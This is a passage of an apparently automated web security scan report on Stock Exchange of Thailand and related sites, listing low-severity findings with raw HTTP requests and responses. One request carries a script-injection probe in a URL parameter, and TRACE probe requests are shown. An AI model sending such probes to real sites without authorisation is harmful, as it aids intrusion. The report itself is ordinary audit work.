Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:36:44 GMT
Server: Apache
Last-Modified: Sat, 04 Jul 2009 08:27:01 GMT
ETag: "cd193-5bf-9797f40"
Accept-Ranges: bytes
Content-Length: 1471
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
.topbox {FONT: 8pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Verdana, AngsanaUPC
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=th"></script>
...[SNIP]...

14.14. http://www.set.or.th/set/eventdetail.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/eventdetail.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:25:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Content-Length: 4064

<html>
<head>

<title>The Stock Exchange of Thailand : Corporate Action Information</title>
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">
</head>
<body>

...[SNIP]...
<td>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

14.15. http://www.set.or.th/set/memberlist.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/memberlist.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

Response

14.16. http://www.set.or.th/set/newsdetails.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/newsdetails.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:24:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=C1251254A60333D6A74A6EE27A20EAF5; Path=/set
Content-Length: 10785

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/set/styles/setstyle.css" rel="stylesheet" type="text/css">

<title>The Stock Excha
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

14.17. http://www.set.or.th/set/newslist.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/newslist.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

GET /set/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

14.18. http://www.set.or.th/set/newsrelease.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/newsrelease.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

Response

14.19. http://www.set.or.th/set/oppdaybyperiod.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/oppdaybyperiod.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

GET /set/oppdaybyperiod.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

14.20. http://www.set.or.th/set/xcalendar.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/set/xcalendar.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/urchin.js

Request

GET /set/xcalendar.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

14.21. http://www.set.or.th/setresearch/setresearch.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/setresearch/setresearch.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hits.truehits.in.th/data/c0002486.js
http://www.google-analytics.com/urchin.js

Request

GET /setresearch/setresearch.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:25:07 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 06:45:19 GMT
ETag: "134f6a-a0de-7bc2ddc0"
Accept-Ranges: bytes
Content-Length: 41182
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SET Research - Thai Capital Market Research Resource</title>
<meta http-equiv="Content-Type" content="text/html
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

15. TRACE method is enabled previous next
There are 6 instances of this issue:

http://capital.sec.or.th/
http://register2.set.or.th/
http://widgets.digg.com/
http://www.cgthailand.org/
http://www.sec.or.th/
http://zeus.flexserving.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

15.1. http://capital.sec.or.th/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://capital.sec.or.th
Path:	/

Request

TRACE / HTTP/1.0
Host: capital.sec.or.th
Cookie: dd9cc4347e61ebfe

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:03:31 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8h PHP/4.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: capital.sec.or.th
Cookie: dd9cc4347e61ebfe

15.2. http://register2.set.or.th/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/

Request

TRACE / HTTP/1.0
Host: register2.set.or.th
Cookie: 712fd9e518143d12

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:17:02 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 73

TRACE / HTTP/1.0
Host: register2.set.or.th
Cookie: 712fd9e518143d12

15.3. http://widgets.digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: c169f084a1c66274

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:07:55 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: c169f084a1c66274
Accept-Encoding: gzip
Connection: Keep-Alive
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.14
x-chpd-loop: 1
Via: 1.0 PXY003-ASHB.COTENDO.NET (chpd/3
...[SNIP]...

15.4. http://www.cgthailand.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cgthailand.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.cgthailand.org
Cookie: c657011359d7a5d4

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:01:31 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cgthailand.org
Cookie: c657011359d7a5d4

15.5. http://www.sec.or.th/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/

Request

TRACE / HTTP/1.0
Host: www.sec.or.th
Cookie: e59b5ca624818569

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:59:30 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d mod_jk/1.2.25 PHP/5.2.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sec.or.th
Cookie: e59b5ca624818569

15.6. http://zeus.flexserving.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://zeus.flexserving.com
Path:	/

Request

TRACE / HTTP/1.0
Host: zeus.flexserving.com
Cookie: 7098caa78081f446

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:40:54 GMT
Server: Apache/2.2.8 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: zeus.flexserving.com
Cookie: 7098caa78081f446

16. Email addresses disclosed previous next
There are 5 instances of this issue:

http://weblink.settrade.com/brokerpage/IPO/images/right_menu/r_menur-02.gif
http://www.moneychannel.co.th/DesktopModules/Events/tooltip.js
http://www.mymemorysafe.com/
http://www.mymemorysafe.com/ScreeningRoom.aspx
http://www.set.or.th/scripts/JSCookMenu.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

16.1. http://weblink.settrade.com/brokerpage/IPO/images/right_menu/r_menur-02.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weblink.settrade.com
Path:	/brokerpage/IPO/images/right_menu/r_menur-02.gif

Issue detail

The following email address was disclosed in the response:

SETCallCenter@set.or.th

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 14:59:14 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2547

<html>
<head>
<title>SETTRADE.COM - Leading Technology for Professional Investors</title>
</head>
<body>
<center>
<table width=650 cellpadding=0 cellspacing=2 border=0>
<tr><td width=1% valign=top><a
...[SNIP]...
<A href="mailto:SETCallCenter@set.or.th">SETCallCenter@set.or.th</a>
...[SNIP]...
<A href="mailto:SETCallCenter@set.or.th">SETCallCenter@set.or.th</a>
...[SNIP]...

16.2. http://www.moneychannel.co.th/DesktopModules/Events/tooltip.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moneychannel.co.th
Path:	/DesktopModules/Events/tooltip.js

Issue detail

The following email address was disclosed in the response:

sales@perpetualmotion.ca

Request

GET /DesktopModules/Events/tooltip.js HTTP/1.1
Host: www.moneychannel.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moneychannel.co.th/
Cookie: .ASPXANONYMOUS=Acw*9QMYU4BmYjdkYWM4Yi01NjIxLTQ5OGMtODU1Yy02ODkzZTYyNGRkYjA1; language=en-US

Response

HTTP/1.1 200 OK
Content-Length: 3000
Content-Type: application/x-javascript
Last-Modified: Mon, 31 Jul 2006 12:55:12 GMT
Accept-Ranges: bytes
ETag: "70b09b8fa0b4c61:4d4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 14:25:38 GMT

//
// DotNetNuke - http://www.dotnetnuke.com
// Copyright (c) 2002-2005
// by Shaun Walker ( sales@perpetualmotion.ca ) of Perpetual Motion Interactive Systems Inc. ( http://www.perpetualmotion.ca )
//
// Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated

...[SNIP]...

16.3. http://www.mymemorysafe.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/

Issue detail

The following email address was disclosed in the response:

memorysafe@yesvideo.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:14:44 GMT
Content-Length: 52728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head id="ctl00_Head1">
...[SNIP]...
<a href="mailto:memorysafe@yesvideo.com"
class="allred_biglink">memorysafe@yesvideo.com</a>
...[SNIP]...

16.4. http://www.mymemorysafe.com/ScreeningRoom.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/ScreeningRoom.aspx

Issue detail

The following email address was disclosed in the response:

memorysafe@yesvideo.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:20:16 GMT
Content-Length: 53115

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head id="ctl00_Head1">
...[SNIP]...
<a href="mailto:memorysafe@yesvideo.com"
class="allred_biglink">memorysafe@yesvideo.com</a>
...[SNIP]...

16.5. http://www.set.or.th/scripts/JSCookMenu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.set.or.th
Path:	/scripts/JSCookMenu.js

Issue detail

The following email addresses were disclosed in the response:

Burton@ntopsupport.com
anders@netspace.net.au
dick@netrex.nl
felix@bebinary.com
georg@lonux.de

Request

GET /scripts/JSCookMenu.js HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance&c7b03'%3E%3Cscript%3Ealert(1)%3C/script%3Ebdd3572e91d=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:36:32 GMT
Server: Apache
Last-Modified: Wed, 09 Jun 2010 09:51:47 GMT
ETag: "78c0a8-adb6-daab32c0"
Accept-Ranges: bytes
Content-Length: 44470
Content-Type: application/x-javascript

/*
   JSCookMenu v2.0.4 (c) Copyright 2002-2006 by Heng Yuan

   http://jscook.sourceforge.net/JSCookMenu/

   Permission is hereby granted, free of charge, to any person obtaining a
   copy of this sof
...[SNIP]...
<georg@lonux.de>
...[SNIP]...
<Burton@ntopsupport.com>
...[SNIP]...
<felix@bebinary.com>
...[SNIP]...
<anders@netspace.net.au>
...[SNIP]...
<dick@netrex.nl>
...[SNIP]...

17. Private IP addresses disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sec.or.th
Path:	/view/view.jsp

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.0.240

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

Response

18. Robots.txt file previous next
There are 6 instances of this issue:

http://banner2.set.or.th/www/delivery/afr.php
http://feeds.bbci.co.uk/news/rss.xml
http://l.addthiscdn.com/live/t00/250lo.gif
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://widgets.digg.com/buttons/count
http://zeus.flexserving.com/apps/serve/delivery/ajs.php

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

18.1. http://banner2.set.or.th/www/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://banner2.set.or.th
Path:	/www/delivery/afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: banner2.set.or.th

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:35 GMT
Server: Apache
Last-Modified: Tue, 05 Feb 2008 11:24:12 GMT
ETag: "a84cd3-17a-7adb8f00"
Accept-Ranges: bytes
Content-Length: 378
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

18.2. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3139
Expires: Tue, 03 May 2011 16:03:59 GMT
Date: Tue, 03 May 2011 15:11:40 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

18.3. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Apr 2011 11:05:10 GMT
ETag: "d71005-1b-4a0b6aa63c580"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 14:23:32 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

18.4. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:12:05 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=87965339
Expires: Fri, 14 Feb 2014 18:00:21 GMT
Date: Tue, 03 May 2011 15:11:22 GMT
Connection: close

User-agent: *
Disallow: /

18.5. http://widgets.digg.com/buttons/count previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 03 May 2011 15:07:56 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=360 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Wed, 04 May 2011 15:07:55 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

18.6. http://zeus.flexserving.com/apps/serve/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://zeus.flexserving.com
Path:	/apps/serve/delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: zeus.flexserving.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:40:56 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Thu, 25 Mar 2010 08:33:19 GMT
ETag: "1428eb8-178-4829be61c51c0"
Accept-Ranges: bytes
Content-Length: 376
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

19. HTML does not specify charset previous next
There are 10 instances of this issue:

http://register2.set.or.th/
http://register2.set.or.th/images/
http://register2.set.or.th/images/Body/
http://register2.set.or.th/semreg/
http://register2.set.or.th/styles/
http://weblink.settrade.com/brokerpage/IPO/images/right_menu/r_menur-02.gif
http://www.cgthailand.org/
http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+'
http://www.set.or.th/chalard_orm/
http://www.set.or.th/setresearch/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

19.1. http://register2.set.or.th/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/

Request

GET / HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:23:55 GMT
Connection: close
Content-Type: text/html
Content-Length: 172

<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

19.2. http://register2.set.or.th/images/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/images/

Request

GET /images/ HTTP/1.1
Referer: http://register2.set.or.th/images/set-logo-index.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:19:09 GMT
Connection: close
Content-Type: text/html
Content-Length: 172

<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

19.3. http://register2.set.or.th/images/Body/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/images/Body/

Request

GET /images/Body/ HTTP/1.1
Referer: http://register2.set.or.th/images/Body/head_semdetail.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 15:19:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 172

<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

19.4. http://register2.set.or.th/semreg/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register2.set.or.th
Path:	/semreg/

Request

GET /semreg/ HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
